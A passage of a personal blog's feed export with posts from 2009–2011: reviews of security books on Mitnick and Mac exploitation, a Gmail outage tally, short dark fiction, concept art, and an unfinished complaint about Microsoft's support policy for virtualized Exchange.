tag:blogger.com,1999:blog-185794162024-03-23T11:23:40.915-07:00ryanlrussellRyan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.comBlogger79125tag:blogger.com,1999:blog-18579416.post-27377817824066833212011-10-07T20:47:00.000-07:002011-10-07T21:21:30.320-07:00Ghost in the WiresGhost in the Wires, Mitnick & Simon<br /><br /><br /><iframe src="http://rcm.amazon.com/e/cm?t=thievco&o=1&p=8&l=as1&asins=0316037702&ref=tf_til&fc1=000000&IS2=1&lt1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe><br /><p>Disclaimer: Kevin Mitnick is a personal friend, and this review is based on a late galley copy. I have no financial interest in this book. The above link is an affiliate link.</p><p>I have been reading books about Kevin Mitnick for years. Finally, we get to read the best one yet. All of the previous authors worked from information they could glean, and some limited interactions with Kevin himself. The problem is, he was playing most of them a lot of the time. What we have here is Kevin's own version of his story, written himself, along with his collaborator William Simon.</p><p>I'll just jump right in; I loved this book. If you have any interest in real-world hacks at all, read it. The other books and news stories didn't cover half of what he did. As I devoured in in two days, I kept turning to people to say "Read this!" or repeating one of his stories for co-workers.</p><p>I have some clear favorite stories, but I don't want to give any spoilers. It's that much like reading a thriller. My favorites are how he defeated the radio encryption used by the FBI, and how he would go about obtaining a new identity. Specifically, how and where he researched the identities, and got the appropriate document papers.</p><p>The sheer audacity that some of his tricks took is amazing to me. He admits things in the first few pages that surprised me. And after reading about how things went with his friends over the years, I finally have some appreciation for why he has such hatred of snitches.</p><p>Let's be clear, this is not a technical book like others I have read. He doesn't cover how to exploit a stack overflow. When he breaks into a Solaris box, he says "I used a Solaris exploit." He says that the reason for that was to make it more readable for the general public. And I don't think he's incorrect in that. The focus is story and history.</p><p>But even if you're a hard-core technical security person, I think you'll like the book for what it is. Unless you think that security begins and ends with writing a cool exploit. Do I think Kevin has technical skills? I do. But those aren't his greatest powers. Yes, he's a fantastic social engineer. And using those skills, he owned more things and companies than probably anyone else. A 0-day exploit that lets you break into a source control server is impressive. But I don't think it's quite as cool as calling up and getting them to just mail you a tape with the source. There's no patch for stupid.</p><p>You'll also enjoy the book if you have an interest in computer or security history like I do. It spans several decades, from when he was a kid interested in magic up to almost present day. There are the cameos from other well-known hackers that have had books written about them as well. I have enjoyed reading articles and seeing Twitter exchanges with Kevin and some of his old victims. (All amiable so far as I have seen.)</p><p>If you want the most accurate version of the Mitnick story available, here you go.<br /></p>Anonymoushttp://www.blogger.com/profile/01938554978113604206noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-12621183058436964902010-04-14T10:43:00.000-07:002010-04-14T11:38:55.863-07:00Gmail uptimeMy manager at BigFix was having a discussion with our CFO about Gmail uptime (in the context of our email infrastructure uptime.)<br /><br />Using this as a data source:<br /><a href="http://www.google.com/appsstatus#hl=en">http://www.google.com/appsstatus#hl=en</a><br /><br />and selecting Google Mail and Postini Services at the items to measure, he arrives at this:<br /><br /><style type="text/css">.nobrtable br { display: none }</style><br /><div class="nobrtable"><br /><table><br /><tbody><tr><br /> <th>Date</th><br /> <th>Service</th><br /> <th>Duration</th><br /> <th>Reason</th><br /></tr><br /><tr><br /> <td>4/9/2010</td><br /> <td>Postini</td><br /> <td>2:24</td><br /> <td>Unspecified Emergency Maintenance</td><br /><br /></tr><br /><tr><br /> <td>4/7/2010</td><br /> <td>Core Gmail</td><br /> <td>11:20</td><br /> <td>HTML mode email down for "a small number of users"</td><br /><br /></tr><br /><tr><br /> <td>4/2/2010</td><br /> <td>Postini</td><br /> <td>2:08</td><br /> <td>Failed Postini update</td><br /><br /></tr><br /><tr><br /> <td>3/16/2010</td><br /> <td>Core Gmail</td><br /> <td>9:51</td><br /> <td>Inbound/Outbound Email was not routing</td><br /><br /></tr><br /><tr><br /> <td>3/15/2010</td><br /> <td>Core Gmail</td><br /> <td>4:38</td><br /> <td>Users unable to access gmail accounts</td><br /><br /></tr><br /><tr><br /> <td>3/10/2010</td><br /> <td>Core Gmail</td><br /> <td>0:50<br /></td><br /> <td>Users unable to access gmail accounts</td><br /><br /></tr><br /><tr><br /> <td>3/8/2010</td><br /> <td>Postini</td><br /> <td>0:29<br /></td><br /> <td>Anti-Spam not anti-spamming</td><br /><br /></tr><br /><tr><br /> <td>3/4/2010</td><br /> <td>Postini</td><br /> <td>0:58<br /></td><br /> <td>Anti-Spam not anti-spamming</td><br /><br /></tr><br /><tr><br /> <td>2/25/2010</td><br /> <td>Postini</td><br /> <td>7:46<br /></td><br /> <td>Users unable to send email</td><br /><br /></tr><br /><tr><br /> <td><br /><br /><br /><br /><br /></td><br /> <td><br /><br /><br /><br /><br /></td><br /> <td>40:24</td><br /> <td><br /><br /><br /><br /><br /></td><br /><br /></tr><br /><br /></tbody></table><br /></div><br />Total runtime (2 services) 2304<br />48 days, 24 hrs day, 2 services<br /><br />Effective uptime<br />98.24%<br /> <br />I have not done my own math here to verify, just thought it would be interesting to share. Note that he gives them twice as many runtime hours since he's counting two services. I would tend to halve that, resulting in double the downtime percentage.<br /><br />I thank Google for publishing their outage information, by the way.<br /><br />Just a data point for the next time someone is asking you for more nines than is reasonable.Anonymoushttp://www.blogger.com/profile/01938554978113604206noreply@blogger.com1tag:blogger.com,1999:blog-18579416.post-38529054662354478852010-03-19T13:53:00.000-07:002010-03-19T14:27:20.440-07:00Contradiction"They are all correct."<br /><br />"How could they ALL be correct? They contradict each-other. You can't have Heaven and Valhalla be the afterlife. If Heaven exists then that means that Valhalla doesn't. And vice-versa."<br /><br />"Think of it as parallel universes."<br /><br />"But doesn't the idea of a God transcend multiple universes? Isn't God the god of all universes?"<br /><br />"Yes."<br /><br />"And so is Zeus?"<br /><br />"Yes. Infinite, parallel parallel universes."<br /><br />"Which universe is Earth in?"<br /><br />"Earth is Earth. The afterlife is different. It is when you change over."<br /><br />"So if I'm from Earth, which one do I go to?"<br /><br />"It depends on what you believe. You determine where you go, when you cross over."<br /><br />"So if I believe in Judeo-Christian Heaven?"<br /><br />"Then you go there."<br /><br />"But what if I believe in that, but don't think I lived well enough?"<br /><br />"Then you go to Hell."<br /><br />"Does that mean there isn't a God?"<br /><br />"All of the gods are. You go to the one you believe in."<br /><br />"What if I believe in reincarnation?"<br /><br />"Then you will be reincarnated."<br /><br />"On Earth?"<br /><br />"On an Earth, yes."<br /><br />"What about the atheists?"<br /><br />"They cease to be."<br /><br />"That doesn't seem fair. They die?"<br /><br />"It is what they believe happens. It is what they cause to happen."<br /><br />"So if you don't have faith in something, you die?"<br /><br />"Faith is not a belief in what might happen. It is what happens. It causes it to happen. If you believe death is the end of your existence, then it is so."<br /><br />"So where would I go?"<br /><br />"What do you believe?"<br /><br />"I don't know, really. I believe... or maybe I hope something happens. I always had a hard time believing one church was right and that the others were wrong. Or that any of them were right. I guess I figured I would find out when it happened. I hope I will have a chance to figure it all out afterward."<br /><br />"That is how you ended up here."Anonymoushttp://www.blogger.com/profile/01938554978113604206noreply@blogger.com5tag:blogger.com,1999:blog-18579416.post-79403963958249063752009-11-29T19:31:00.000-08:002009-11-29T21:04:03.452-08:00Fixer-UpperContinued from <a href="http://ryanlrussell.blogspot.com/2009/11/welcome-home.html">Welcome Home</a><br /><br />The sunlight disappeared again, and he assumed he was wheeled into a building. He felt several turns and a jolt that he thought must have been his gurney being shoved through a swinging door. He came to a halt, and another bright light painted his face sheet. Very artificial light.<br /><br />The sheet was pulled away. More surgical masks this time. There was an overhead light on an articulated arm. Buzzed, muffled voices, one of the masked individuals gestured at the light to another. The latter grabbed a handle on the side of the light with a gloved hand, and aimed it directly into his face, forcing him to squeeze his eyes closed.<br /><br />He felt latex-covered fingers prodding his head and neck. A shadow fell over his face, and he opened his eyes to see a masked face with plastic glasses leaning over his, looking into his face. He assumed the face belonged to a surgeon. The mask, glasses, head cover, gown, mostly blue paper said medical to him. The surgeon's head was blocking the flow of light. He could see the surgeon's jaw moving behind the mask, looking at him, talking to him, but all he could hear was the buzzing, muffled sounds. The surgeon gave up, and shook his head "no" to someone beside him.<br /><br />The head withdrew and the bright light shut his eyes again. The probing fingers returned, concentrating on his neck. They pressed hard, causing him to flinch from the pressure. Down the side of his neck they poked, until they were partway down his shoulders, where the poking was replaced by a slight pressure or tugging. This was repeated multiple times on each side. Poking hard enough to get a reaction higher up on his neck, and then gentle pressure as they went further down his shoulders.<br /><br />He felt fingers at his ears, pulling them in different directions from the outside. He didn't feel them extract whatever had been shoved into his ears that kept him from hearing, but they inserted something cold and hard into his right ear. His ear was still numb and the sound was muffled, when he felt a sudden stabbing pain in his ear. He instinctively tried to jerk, but the movement was truncated by the screws that still held his head in place. It didn't stop the stars of pain from lighting up his closed eyes.<br /><br />While he was concentrating on stilling himself, the intensity of the light on his face abated. He opened his eyes and blinked away the tears. Looking up, he saw the light was aimed further down his body. He tried to follow with his eyes, but he was lying flat, and there were tubes at his nose and mouth partially blocking his view. He could see the surgeon's side near his face. The surgeon was bent over his body.<br /><br />He watched the surgeon take several scalpels in a row, and bend low over him each time. Each time, he would place the bloody scalpel on a tray. He couldn't feel any pain. He realized that he must have been heavily drugged most of the time for days, which is why he couldn't move and was so foggy.<br /><br />He didn't have any memory of his capture or injuries. He didn't know who had him, or if they were the ones who did this to him. He had eliminated the possibility that it was just medical personnel. Hospitals don't use military transports, and they don't keep you moving for days before they operate. Unless he dreamed all of that. Unless he'd already received some treatment. But he couldn't have dreamed all of it. He knew they had found him.<br /><br />Next the surgeon grabbed some kind of big pliers or clamp. He saw that they opened when the handles were squeezed as the surgeon flexed them. He must have left them in place, because he stood up empty handed. He was handed what looked almost like a soldering gun, but when the surgeon pulled the trigger, he could see a small blade vibrate at the end, almost like a tiny skillsaw.<br /><br />His eyes went wide when he realized that it was a sternum saw, and that his chest was being cut open. His eyes went wide, and he tried to thrash. The panic made him able to ignore the pain as he writhed and his eyes rolled in his skull. The surgeon stopped momentarily and motioned in his direction with a tilt of his head. From behind, he felt a needle insert into his neck. A slight burning spread up the blood vessel in his neck. The needle was withdrawn, and they unceremoniously dropped the sheet back over his head box.<br /><br />As he sank down below consciousness, he thought "why are they keeping me alive?"Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com0tag:blogger.com,1999:blog-18579416.post-19979495456773626142009-11-23T15:43:00.000-08:002009-11-23T17:09:14.439-08:00Welcome HomeI thought I might experiment with some serialized fiction on my blog. I'm trying a slightly different style. I'm going to attempt to be a little gory and disturbing so if that bothers you, fair warning. I'll have a tag for these posts later.<br /><br />-- end author's note<br /><br />The jolt from the helicopter landing shook him into awareness. Another stab of lightning shot through his head and made his vision go white. Water leaked from behind his eyelids, squeezed tight from the pain. He knew it was a helicopter from the vibrations of the rotors. He had spent a little time on helicopters in his 20's.<br /><br />He couldn't tell if it had been days, or a week, or more. He spent much of the time unconscious from pain or drugs. Or not being able to tell the difference between real and imagined. Rarely, he could catch a blurry glimpse of the inside of an ambulance or plane when they would remove his head covering to work on him. If he didn't have an overhead light blinding him.<br /><br />Every face he caught sight of during this time was covered with a mask. These ranged from baby-blue or white surgical masks, to Army green and SWAT black gas masks.<br /><br />He could tell words were being spoken all around him, but was unable to understand them. Not because they weren't English. He thought they were, from the rhythms of the words. He couldn't understand because they had shoved something in his ears days ago and left it there. Words came to him as a buzzing, scratchy sound. The loudest thing in his head was a constant tone, like an old modem trying to sync. He could "hear" the helicopter blades as a vibration in his skull. His ears hurt, but the pain level barely registered above the symphony of hurt that was his head.<br /><br />Frightening to him, it was only his head that hurt. He had been able to see down his body twice. Each time, covered and strapped down. The whole time he was in custody, they had him strapped down to a gurney. He thought he had moved his arms and legs a few times while strapped down. Simultaneously light and drug-deadened.<br /><br />Tubes ran through his mouth and nose. A machine pumped air in and out of him. He could feel temperatures and pulses slide through the tubes. His head was caged in a scaffold of bars, forming a box. At odd angles to the box were long, spiked screws that drilled directly into his skull, immobilizing him. The entire box was draped with a sheet.<br /><br />Shadows across the sheet indicated that there were men at the sides of his gurney. It started to shake, and then it felt like he was rolling. He imagined fabric straps being release from the floor and walls and his wheels being unlocked. He was rolled towards what must be the helicopter door, and hoisted by his pall bearers. He floated through the air briefly until his wheels made contact with ground again. There was a qualitative difference between rolling on the steel floor of a vehicle and the rough pavement or concrete he rolled on now.<br /><br />As he rolled, the shadow line suddenly crossed his sheet, and bright light illuminated his covering. He could immediately tell the sunlight from the artificial lights he'd been under. The warmth and color were unmistakable.<br /><br />It was the last time he would ever see sunlight with his own eyes.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-42884141937023542582009-05-11T21:22:00.001-07:002009-05-11T21:28:53.658-07:00Concept ArtSome concept art for a project I'm working on with my oldest son. He's the artist, not I.<p><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzOyG2nU3LQigWGRiUNyapS_IGH7lhUTAFUOLEkaEJrdagkGLxwaEOFTVPozHpd_u_gLNxkFIO1xkTyfaDTcPPfzr6JS7t9k0ay9eDdOpq6j828c-YUmUiZUmmvmlhN6Eqe-ofHQ/s1600-h/concept80001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 157px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzOyG2nU3LQigWGRiUNyapS_IGH7lhUTAFUOLEkaEJrdagkGLxwaEOFTVPozHpd_u_gLNxkFIO1xkTyfaDTcPPfzr6JS7t9k0ay9eDdOpq6j828c-YUmUiZUmmvmlhN6Eqe-ofHQ/s400/concept80001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789515801230034" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX6ASNz8fh3f6ncwzSFXlsFEIer_R_CfFzenX5UYlLVlGMApGUlMtrhmq8ysR7Gr0S-tqUf9obYRFD2x8alqOUvIwZX9M7iNhYlRefFvYWwTU8MHu96huavnrrCIJaMuxi0TS2PQ/s1600-h/concept70001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 310px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX6ASNz8fh3f6ncwzSFXlsFEIer_R_CfFzenX5UYlLVlGMApGUlMtrhmq8ysR7Gr0S-tqUf9obYRFD2x8alqOUvIwZX9M7iNhYlRefFvYWwTU8MHu96huavnrrCIJaMuxi0TS2PQ/s400/concept70001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789410759599378" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55ZxvT8h_IP04KyFik9W3aIRdVA2zZCZHrQybmbQm2wGYv4pZB_knNUVG7hl7NjFegOFXC0IMZrmqqE4RuISJa83SWyFBGLKIH2uxapYvRprSHBQFw2srYe1B-dhBR3N0eDSgcw/s1600-h/concept60001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 246px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55ZxvT8h_IP04KyFik9W3aIRdVA2zZCZHrQybmbQm2wGYv4pZB_knNUVG7hl7NjFegOFXC0IMZrmqqE4RuISJa83SWyFBGLKIH2uxapYvRprSHBQFw2srYe1B-dhBR3N0eDSgcw/s400/concept60001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789333227298930" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxM8XttTXgtddTpfegbBsMKuDjUk6Pl5VjAVaUOCQgPdszhJS2WrROOcjXfNdlFpZCtXljF4UeKbqkMANBTKTkB9GQbWbi9Ic4UBYhMD8pjna13VuMlIzGiWXIooNitR8QkBIkkQ/s1600-h/concept50001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 304px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxM8XttTXgtddTpfegbBsMKuDjUk6Pl5VjAVaUOCQgPdszhJS2WrROOcjXfNdlFpZCtXljF4UeKbqkMANBTKTkB9GQbWbi9Ic4UBYhMD8pjna13VuMlIzGiWXIooNitR8QkBIkkQ/s400/concept50001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789257578019522" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8S41A7FnaD9SMqVxPPjjfp8PMB3iPPpJoig0auP5kbOAjwxB5v6QKPevtI15ewoQjWXSoqHyYRsmcFrL9zAjKkeUiU6a2xEvSismxwflZXwDpJfUlxnBBAkYZPm5WS9sbQqPVg/s1600-h/concept40001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 309px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8S41A7FnaD9SMqVxPPjjfp8PMB3iPPpJoig0auP5kbOAjwxB5v6QKPevtI15ewoQjWXSoqHyYRsmcFrL9zAjKkeUiU6a2xEvSismxwflZXwDpJfUlxnBBAkYZPm5WS9sbQqPVg/s400/concept40001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334789157570679922" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8uPR7C6SJPoA-eljLj9wn7zKjlhabZp-IMfwJJAMucd5phGGyp4SngGMS-zGgSqgd6G2-27mOtg2btDSMpg1nVPs0E3Zjv09bN2VzPKR4A1G8k3PyZq5k3XUjGlnba3mSpuWdg/s1600-h/concept30001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 304px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI8uPR7C6SJPoA-eljLj9wn7zKjlhabZp-IMfwJJAMucd5phGGyp4SngGMS-zGgSqgd6G2-27mOtg2btDSMpg1nVPs0E3Zjv09bN2VzPKR4A1G8k3PyZq5k3XUjGlnba3mSpuWdg/s400/concept30001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788999376614386" border="0" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisM7X7948OpnxbMxfNHJANHitcrdNQw5xFy7cxWSYrcgZFkWOosbWSibYc0VsArIzW34Kw1EJ94qCX20uTlt1JUf_PrrfbMZPLxYuWFUTyH7s9MxO9jk9tlupfTc1OsJXZTQFUYQ/s1600-h/concept10001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 291px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisM7X7948OpnxbMxfNHJANHitcrdNQw5xFy7cxWSYrcgZFkWOosbWSibYc0VsArIzW34Kw1EJ94qCX20uTlt1JUf_PrrfbMZPLxYuWFUTyH7s9MxO9jk9tlupfTc1OsJXZTQFUYQ/s400/concept10001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788445785998978" border="0" /></a><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlZu_-KYa_Ml2E1RjsnXNXNyloLkBmldDl1VbkYM8Aq5EgazKqvEwgXkP0mdV0gg6PZhewMdWdaXhZZLVG_G2gWcl9uv7Ktqq7hj8vIcGxFkuDV0sMbhjfD6HahY3yArEGKBgQw/s1600-h/concept20001.JPG"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 285px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYlZu_-KYa_Ml2E1RjsnXNXNyloLkBmldDl1VbkYM8Aq5EgazKqvEwgXkP0mdV0gg6PZhewMdWdaXhZZLVG_G2gWcl9uv7Ktqq7hj8vIcGxFkuDV0sMbhjfD6HahY3yArEGKBgQw/s400/concept20001.JPG" alt="" id="BLOGGER_PHOTO_ID_5334788798066126034" border="0" /></a><br /><br /></p>Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com4tag:blogger.com,1999:blog-18579416.post-79369275848872175462009-05-11T20:22:00.000-07:002009-05-11T21:13:48.960-07:00The Mac Hacker's Handbook<div style="text-align: left;"><iframe src="http://rcm.amazon.com/e/cm?t=thievco&o=1&p=8&l=as1&asins=0470395362&fc1=000000&IS2=1&lt1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width: 120px; height: 240px;" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe><br /></div><br />The Mac Hacker's Handbook is the best reference for Mac-specific attack information that I have found. At 368 pages, it may appear small compared to the typical 750+ page security tome. That's because the authors have done a near-perfect job of sticking to the topic at hand, the Mac. The authors do not succumb to the usual temptation to try and teach assembly language or reverse engineering. Rather, they do an excellent job touching on those topics in an OS X context, and assume the reader has a little background in that area already, or can otherwise keep up. I have done some limited research into the areas of Mac malware and process injection in the past. This book has done a fantastic job of filling in many holes in my knowledge that I hadn't been able to take care of before. Plus, it introduced me to a number of Mac-specific security features I wasn't aware of before. Highly recommended for anyone interested in Mac security.<br /><br />Detailed commentary follows.<br /><br />The authors Charlie Miller and Dino Dai Zovi have impressed me on several levels.<br /><br />A couple of years ago, I did a presentation of Mac malware, where I researched some similar areas on my own. The purpose of my talk was to demonstrate that the privilege separation on a typical single-user OS X box made no difference, because an attacker could do everything they need from user mode.<br /><br />My skills are somewhere between beginner and intermediate in the areas of programming, reverse engineering, vulnerability research and exploit writing. With a lot of work, I was able to create a very crude keyboard sniffer by attaching a library to launched processes. In one chapter (chapter 11), this book spelled out everything I needed to know and more. And implements several useful injected components in a much more flexible way than I was able to. I could have really used this information then.<br /><br />I ran across many of the same libraries and examples that the authors reference in the book. However, they were mostly code examples with no context, intended to be groked by hard-core Mac programmers. Here, they are presented in an actual understandable way, building on examples as they go. It makes a huge difference. The level of writing meshed perfectly with my past knowledge and filled in the holes I had. I have an advantage over a rank beginner, but I suspect they have reached as wide an audience as is possible with their writing.<br /><br />They do this consistently throughout the book. And this is what really made this an excellent book for me, was the actual writing. You'll have to excuse me if I geek out a little bit on this topic, but I've written a few technical books myself, and I have a great appreciation for how hard it is to do this well.<br /><br />There are many traps one can fall into when writing a book like this. A lot of the topics are circular. As in, it's difficult to pick a sane order to follow, and not repeat a lot of information. There's always a temptation to try and show off advanced topics, and not adequately cover the intro material. It's easy to get lazy and not put the time into explaining a concept, assuming everyone knows it. Authors sometimes dump a lot of pictures and code on the reader for length.<br /><br />These authors fell for none of these. The ordering of topics and advancing difficulty seem ideal. Code is almost uniformly useful and well-documented. They don't beat you over the head with example after example for the same topic. Rather than attempting to include a complete PowerPC and x86 instruction reference, they give you the minimum set of instructions that they used. The pacing was great. I was neither bored reading things I knew, nor unable to keep up with the material (until I struggled slightly to absorb the last chapter or two.)<br /><br />Production values are good. The price is great, the length is very appropriate. Editing is good. (Not perfect; I spotted a dozen very minor typos. But then, I can't turn off my internal proofreader anymore, you're unlikely to notice most if any of those.)<br /><br />There are other minor things to appreciate if you've been around vulnerabilities and exploits for a while. I feel like they did a great job explaining heap exploitation, compared to other attempts I've read. I very much enjoyed the little bits of history when they discuss who pioneered a particular technique. Most of Dino's code has a date in the comments, so you have some idea what was known at the time.<br /><br />I'd go so far as to say that this book really is a general book about how to find and exploit vulnerabilities, using the Mac as your research platform. And it turns out that the Mac is a great place to learn.Ryan Russellhttp://www.blogger.com/profile/13265663681454609204noreply@blogger.com2tag:blogger.com,1999:blog-18579416.post-91458182829340864652009-04-02T00:02:00.000-07:002009-04-02T01:13:38.731-07:00Hey! You! Get off of that cloud!Or Microsoft won't support you.<br /><br />We've had an interesting several days dealing with Microsoft at work. <span class="blsp-spelling-error" id="SPELLING_ERROR_0">BigFix</span> recently signed an Enterprise Agreement with Microsoft, where we committed to X licenses of the workstation OS, and put a number of other things under Select Agreement, including Server OSes, Exchange, <span class="blsp-spelling-error" id="SPELLING_ERROR_1">SQL</span> Server, <span class="blsp-spelling-error" id="SPELLING_ERROR_2">MSDN</span> subscriptions, and so on. This came with a few free support calls.<br /><br />Our OS X and iPhone users (in particular, our CEO) have been anxious to get on Exchange 2007 for the rumored improved Entourage and iPhone support around calendars. So when our CFO wrote the large (for us) check to Microsoft, the IT Team committed to implementing Exchange 2007 in an aggressive time frame. Currently, we're using Exchange and <span class="blsp-spelling-error" id="SPELLING_ERROR_3">OWA</span> 2003.<br /><br />Doing some research, it looked like the best option was to build new Exchange and <span class="blsp-spelling-error" id="SPELLING_ERROR_4">OWA</span> machines and migrate mailboxes. It also looks like the best OS choice is Windows 2003 Server Enterprise 64-bit. We read some documents that indicate Exchange 2007 isn't fully supported on 32-bit Server, and has only just been qualified on Server 2008.<br /><br />We put Exchange itself on physical hardware for performance reasons. It's probably not really <span class="blsp-spelling-corrected" id="SPELLING_ERROR_5">necessary</span>, but we're being conservative. We used a Dell 2850 with about 1TB of disk and 32GB of RAM that was a <span class="blsp-spelling-error" id="SPELLING_ERROR_6">VMWare</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_7">ESX</span> server until I replaced it with an even larger Dell R900. It's running Windows Server 2003 Enterprise R2 64-bit. The <span class="blsp-spelling-error" id="SPELLING_ERROR_8">OWA</span> machine doesn't need any particular performance characteristics though, so we decided to put it on a <span class="blsp-spelling-error" id="SPELLING_ERROR_9">VM</span>. It's on the same OS. No problems running 64-bit guests, by the way. We do it all the time.<br /><br />Like many companies, we're trying to <span class="blsp-spelling-error" id="SPELLING_ERROR_10">virtualize</span> a lot of our infrastructure. We've made a fairly large investment in <span class="blsp-spelling-error" id="SPELLING_ERROR_11">VMWare's</span> enterprise products for a company our size, especially in our Engineering organization. I won't get into the benefits here, but for us they are substantial, and our entire disaster recovery plan is tied to <span class="blsp-spelling-error" id="SPELLING_ERROR_12">VMWare</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_13">ESX</span>.<br /><br />Things were on schedule with the Exchange 2007 configuration. In the interest of time, we had made one support call to Microsoft for install problems on the physical hardware. It burned the equivalent of $299, but for our schedule, it was easily worth it. Exchange was working.<br /><br />We ran into a second issue with <span class="blsp-spelling-error" id="SPELLING_ERROR_14">OWA</span> 2007. My sysadmin was having trouble getting Outlook Anywhere to work correctly with Outlook 2003 and Entourage. He called again. This time, while the Microsoft support engineer was remote into our <span class="blsp-spelling-error" id="SPELLING_ERROR_15">OWA</span> server, he saw <span class="blsp-spelling-error" id="SPELLING_ERROR_16">VMWare</span> Tools in the Add/Remove Programs list. He asked, and we said yeah, it's a <span class="blsp-spelling-error" id="SPELLING_ERROR_17">VM</span>.<br /><br />He said he could not support us, closed the ticket, and advised us to rebuild on physical hardware and call back. The support engineer also said that if we had had Premier Support, that he could "Look into it." He cited this article: <a href="http://support.microsoft.com/kb/897615">http://support.microsoft.com/kb/897615</a><br /><br />I'll summarize it: Microsoft only supports <span class="blsp-spelling-error" id="SPELLING_ERROR_18">virtualized</span> Windows and MS apps if you use Microsoft <span class="blsp-spelling-error" id="SPELLING_ERROR_19">virtualization</span> software.<br /><br />That had never <span class="blsp-spelling-corrected" id="SPELLING_ERROR_20">occurred</span> to any of us in the IT department. That policy is so ridiculous as to defy belief.<br /><br />I complained into the air on Twitter. I got two categories of response: Lie to Microsoft Support, and No, they do support it. It's called the <span class="blsp-spelling-error" id="SPELLING_ERROR_21">SVVP</span>.<br /><br />Sure, we're willing to lie to support. We just didn't know it was <span class="blsp-spelling-corrected" id="SPELLING_ERROR_22">necessary</span>, and we got caught this time.<br /><br />By the way, I'm going to jump ahead in the story for a moment and say that yes, we did rebuild <span class="blsp-spelling-error" id="SPELLING_ERROR_23">OWA</span> on physical hardware and call back. And it turns out that the problem was on the Exchange server, NOT the <span class="blsp-spelling-error" id="SPELLING_ERROR_24">OWA</span> server. So no, it's not possible that <span class="blsp-spelling-error" id="SPELLING_ERROR_25">VMWare</span> was a factor, and yes, we did waste days and slipped our schedule for no good reason. I say this mostly to save you the trouble of trying to fix my technical problem, it's already done.<br /><br />And of course, that's not the real issue.<br /><br />During these several days while my sysadmin gave up and build a physical box to appease Microsoft Support, the rest of us were complaining bitterly to our Microsoft sales rep. We still could not believe that they really intended to have that as a policy. He insists that they did. He knows, because he has had "lots of customers complain about it."<br /><br />What about the <a href="http://www.windowsservercatalog.com/svvp.aspx"><span class="blsp-spelling-error" id="SPELLING_ERROR_26">SVVP</span></a>, I asked my sales rep? Both a Microsoft employee and a <span class="blsp-spelling-error" id="SPELLING_ERROR_27">VMWare</span> employee pointed out to me on Twitter that <span class="blsp-spelling-error" id="SPELLING_ERROR_28">ESX</span> IS supported. Nope, my sales rep says that's only for the Windows OS itself.<br /><br />But wait, the <span class="blsp-spelling-error" id="SPELLING_ERROR_29">VMWare</span> guy pointed out to me that <a href="http://technet.microsoft.com/en-us/library/cc794548.aspx">Exchange on <span class="blsp-spelling-error" id="SPELLING_ERROR_30">VM</span></a> is specifically covered under the <span class="blsp-spelling-error" id="SPELLING_ERROR_31">SVVP</span>. Surely this means I'm good, right? This is just a case of Microsoft Support not being up on the latest Microsoft policies?<br /><br />Nope. That article only covers Exchange 2007 SP1 (good) on <span class="blsp-spelling-error" id="SPELLING_ERROR_32">SVVP</span> <span class="blsp-spelling-error" 